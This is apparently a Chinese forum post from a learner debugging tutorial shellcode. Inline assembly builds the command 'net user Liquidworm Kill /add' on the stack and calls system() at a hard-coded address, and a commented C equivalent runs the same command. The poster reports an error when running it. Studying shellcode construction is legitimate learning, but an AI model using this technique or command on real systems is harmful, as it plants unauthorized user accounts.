今天看教程，但是在调试代码的时候有问题。
#include <windows.h>
#include <winbase.h>

void main(void)
{       
        LoadLibrary("msvcrt.dll");
        __asm
        {
                mov esp,ebp
                push ebp               
                mov ebp,esp
                xor edi,edi
                push edi
                mov ebp,esp
                sub esp,1dh
                mov byte ptr [ebp-1dh],6eh
                mov byte ptr [ebp-1ch],65h
                mov byte ptr [ebp-1bh],74h
                mov byte ptr [ebp-1ah],20h
                mov byte ptr [ebp-19h],75h
                mov byte ptr [ebp-18h],73h
                mov byte ptr [ebp-17h],65h
                mov byte ptr [ebp-16h],72h
                mov byte ptr [ebp-15h],20h
                mov byte ptr [ebp-14h],4ch
                mov byte ptr [ebp-13h],69h
                mov byte ptr [ebp-12h],71h
                mov byte ptr [ebp-11h],75h
                mov byte ptr [ebp-10h],69h
                mov byte ptr [ebp-0fh],64h
                mov byte ptr [ebp-0eh],77h
                mov byte ptr [ebp-0dh],6fh
                mov byte ptr [ebp-0ch],72h
                mov byte ptr [ebp-0bh],6dh
                mov byte ptr [ebp-0ah],20h
                mov byte ptr [ebp-09h],6bh
                mov byte ptr [ebp-08h],69h
                mov byte ptr [ebp-07h],6ch
                mov byte ptr [ebp-06h],6ch
                mov byte ptr [ebp-05h],20h
                mov byte ptr [ebp-04h],2fh
                mov byte ptr [ebp-03h],61h
                mov byte ptr [ebp-02h],64h
                mov byte ptr [ebp-01h],64h
                push esp
                mov eax,0040eeb0h
                call eax
        }
}

/*
#include <windows.h>
void main(void)
{
        LoadLibrary("msvcrt.dll");
        system("net user Liquidworm Kill /add");
}
*/
呵呵，上面的asm代码不知道写的对不对啊。就是构造参数，然后把参数在入栈，最后调用system的地址。但是运行的时候有个错误框啊。

[课程]Linux pwn 探索篇！